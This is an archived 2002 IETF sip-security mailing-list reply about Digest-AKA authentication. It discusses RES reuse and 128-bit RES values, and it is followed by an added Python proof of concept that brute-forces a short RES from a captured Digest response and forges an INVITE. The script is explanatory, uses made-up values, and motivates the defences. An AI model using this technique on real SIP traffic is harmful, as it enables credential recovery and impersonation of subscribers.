Re: [Sip-security] RE: SIP authentication problem when using RES in Digest-AKA
Jari Arkko <jari.arkko@piuha.net> Mon, 18 March 2002 18:22 UTC
Received: from optimus.ietf.org (ietf.org [132.151.1.19] (may be forged)) by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA14241 for <sip-security-archive@odin.ietf.org>; Mon, 18 Mar 2002 13:22:45 -0500 (EST)
Received: (from daemon@localhost) by optimus.ietf.org (8.9.1a/8.9.1) id NAA23825 for sip-security-archive@odin.ietf.org; Mon, 18 Mar 2002 13:22:48 -0500 (EST)
Received: from optimus.ietf.org (localhost [127.0.0.1]) by optimus.ietf.org (8.9.1a/8.9.1) with ESMTP id NAA23639; Mon, 18 Mar 2002 13:18:43 -0500 (EST)
Received: from ietf.org (odin [132.151.1.176]) by optimus.ietf.org (8.9.1a/8.9.1) with ESMTP id NAA23608 for <sip-security@optimus.ietf.org>; Mon, 18 Mar 2002 13:18:37 -0500 (EST)
Received: from p2.piuha.net (p2.piuha.net [131.160.192.2]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA14094 for <sip-security@ietf.org>; Mon, 18 Mar 2002 13:18:33 -0500 (EST)
Received: from piuha.net (p4.piuha.net [131.160.192.4]) by p2.piuha.net (Postfix) with ESMTP id EA92E6A905; Mon, 18 Mar 2002 20:17:34 +0200 (EET)
Message-ID: <3C960ACB.9040907@piuha.net>
Date: Mon, 18 Mar 2002 17:42:03 +0200
From: Jari Arkko <jari.arkko@piuha.net>
Reply-To: jari.arkko@piuha.net
Organization: None
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.5) Gecko/20011014
X-Accept-Language: en-us
MIME-Version: 1.0
To: Greg Rose <ggr@qualcomm.com>
Cc: James Undery <jundery@ubiquity.net>, John W Noerenberg II <jwn2@qualcomm.com>, sip-security@ietf.org, aki.niemi@nokia.com, jari.arkko@ericsson.com, vesa.torvinen@ericsson.fi, Sanjoy Sen <sanjoy@nortelnetworks.com>
Subject: Re: [Sip-security] RE: SIP authentication problem when using RES in Digest-AKA
References: <4.3.1.2.20020318120008.01ac4fb8@127.0.0.1>
Content-Type: text/plain; charset="us-ascii"; format="flowed"
Content-Transfer-Encoding: 7bit
Sender: sip-security-admin@ietf.org
Errors-To: sip-security-admin@ietf.org
X-Mailman-Version: 1.0
Precedence: bulk
List-Id: Security Issues for the SIP protocol <sip-security.ietf.org>
X-BeenThere: sip-security@ietf.org
Greg Rose wrote in response to James Undery:

>> The RES 'secret' is surely going to be recalculated each time the
>> session entropy (i.e. nonce) changes. Thus I'd modify step 4 and add
>> pre7
>
> This is definitely not in line with the intent of AKA, or the existing
> architecture.

What I understood James to be proposing is that *if* AKA is used for the
authentication of an INVITE to the home after being used for
authenticating a REGISTER, then AKA should be re-run.

In the above, do you mean the 3GPP architecture in 'the existing
architecture'? From what I understand, the 3GPP architecture only intends
to authenticate REGISTERs with AKA. Therefore, if draft-niemi allows
anything to happen after the first authentication, it is beyond the 3GPP
architecture. If plugging a security hole requires that we never allow
AKA authentication to be reused and always need a new full AKA run, I
would say that's fine.

Greg, does preventing reuse of the same RES help to block the security
problem? Also, I have proposed simply requiring 128-bit RES values to be
used. That solves the problem, but is there any reason why we couldn't
require it?

Then we have another matter of how the INVITEs are authenticated in 3GPP.
That is based on the session keys generated as a side effect of AKA.
Let's keep the "AKA re-run to the home" discussion separate from this.

Jari

_______________________________________________
Sip-security mailing list
Sip-security@ietf.org
https://www1.ietf.org/mailman/listinfo/sip-security
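The exchange above turns on two questions: whether a short RES can be recovered by an attacker who merely watches one Digest-AKA transaction, and whether letting the same RES authenticate later requests (an INVITE after the REGISTER) turns that recovery into an impersonation. The script below is an added illustration written for this archive page; it is not code from the thread participants, from draft-niemi or from 3GPP. It follows the Digest-AKA mapping in draft-niemi (later RFC 3310), where the AKA result RES is used as the HTTP Digest password and the nonce carries RAND and AUTN, and it uses the standard RFC 2617 qop=auth response computation. Every concrete value (user, realm, RAND, AUTN, cnonces, URIs) is made up, and RES is shortened to 16 bits purely so the exhaustive search finishes in well under a second; a real RES is longer, but the attack scales as 2^len(RES) either way, which is exactly why the 128-bit requirement discussed above closes it.

```python
import base64
import hashlib

# Constructed values for this example only; none of them come from the thread.
USER, REALM = "user@example.com", "example.com"
RAND = bytes(range(16))             # stand-in for the AKA challenge RAND
AUTN = bytes(range(16, 32))         # stand-in for the AKA authentication token AUTN
RES_BITS = 16                       # deliberately short so the search below is quick
RES = bytes.fromhex("beef")         # the RES the USIM would compute from RAND


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def aka_nonce(rand: bytes, autn: bytes) -> str:
    """Digest-AKA nonce: base64(RAND || AUTN || server-specific data); no server data here."""
    return base64.b64encode(rand + autn).decode("ascii")


def digest_response(username, realm, res, nonce, method, uri, nc, cnonce, qop="auth"):
    """RFC 2617 qop=auth response with the raw RES bytes used as the Digest password."""
    ha1 = md5_hex(f"{username}:{realm}:".encode("ascii") + res)
    ha2 = md5_hex(f"{method}:{uri}".encode("ascii"))
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}".encode("ascii"))


def recover_res(observed, username, realm, nonce, method, uri, nc, cnonce, res_bits):
    """Offline exhaustive search for RES.

    Everything in the captured Authorization header except RES is public, so the
    attacker simply recomputes the response for every candidate RES value.
    """
    nbytes = (res_bits + 7) // 8
    for cand in range(1 << res_bits):
        res = cand.to_bytes(nbytes, "big")
        if digest_response(username, realm, res, nonce, method, uri, nc, cnonce) == observed:
            return res
    return None


def demo(res_bits=RES_BITS, res=RES):
    """Run the attack end to end and report what the attacker achieves."""
    nonce = aka_nonce(RAND, AUTN)

    # 1. Legitimate REGISTER; the attacker passively captures the Authorization header.
    captured = digest_response(USER, REALM, res, nonce,
                               "REGISTER", "sip:example.com", "00000001", "cafe0001")

    # 2. Offline brute force of RES from the captured response.
    recovered = recover_res(captured, USER, REALM, nonce,
                            "REGISTER", "sip:example.com", "00000001", "cafe0001", res_bits)
    if recovered is None:
        return {"recovered": None, "reuse_forgery_accepted": False,
                "fresh_aka_forgery_accepted": False}

    # 3. If the same RES (same RAND/nonce) is accepted for a later request, the
    #    attacker can now author a valid INVITE with a cnonce of their choosing.
    #    The verifier holds XRES (== res) and recomputes the expected response.
    forged = digest_response(USER, REALM, recovered, nonce,
                             "INVITE", "sip:bob@example.com", "00000002", "attacker1")
    expected = digest_response(USER, REALM, res, nonce,
                               "INVITE", "sip:bob@example.com", "00000002", "attacker1")

    # 4. If instead a fresh AKA run is required, RAND and hence RES change, and the
    #    recovered value is useless against the new challenge.
    fresh_rand, fresh_res = bytes(16), bytes.fromhex("1234")      # constructed new AV
    fresh_nonce = aka_nonce(fresh_rand, AUTN)
    forged_fresh = digest_response(USER, REALM, recovered, fresh_nonce,
                                   "INVITE", "sip:bob@example.com", "00000001", "attacker2")
    expected_fresh = digest_response(USER, REALM, fresh_res, fresh_nonce,
                                     "INVITE", "sip:bob@example.com", "00000001", "attacker2")

    return {
        "recovered": recovered,
        "reuse_forgery_accepted": forged == expected,
        "fresh_aka_forgery_accepted": forged_fresh == expected_fresh,
    }


if __name__ == "__main__":
    print(demo())
```

The search cost is 2^len(RES) MD5 triples; at 16 bits it is instantaneous, at 32 bits it is minutes on commodity hardware, and at 128 bits it is out of reach, which is the point of requiring 128-bit RES values. Re-running AKA for every authenticated request does not make RES harder to recover, but it removes what the attacker can do with it: step 4 shows the recovered value failing against a fresh challenge. The two proposals in the message above therefore address different halves of the problem, and neither substitutes for the other.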
- [Sip-security] SIP authentication problem when us… John W Noerenberg II
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] [Sipping] RE: SIP authentication p… John W Noerenberg II
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- [Sip-security] Re: [Sipping] SIP authentication p… Jari Arkko
- [Sip-security] Re: [Sipping] SIP authentication p… Greg Rose
- [Sip-security] Re: [Sipping] SIP authentication p… Jari Arkko
- [Sip-security] Re: SIP authentication problem whe… Niemi Aki (NET/Espoo)
- [Sip-security] Re: SIP authentication problem whe… Niemi Aki (NET/Espoo)
- [Sip-security] Re: SIP authentication problem whe… Jari Arkko
- [Sip-security] Re: [Sipping] SIP authentication p… Niemi Aki (NET/Espoo)
- [Sip-security] RE: SIP authentication problem whe… James Undery
- [Sip-security] Re: [Sipping] Re: SIP authenticati… Niemi Aki (NET/Espoo)
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… John W Noerenberg II
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko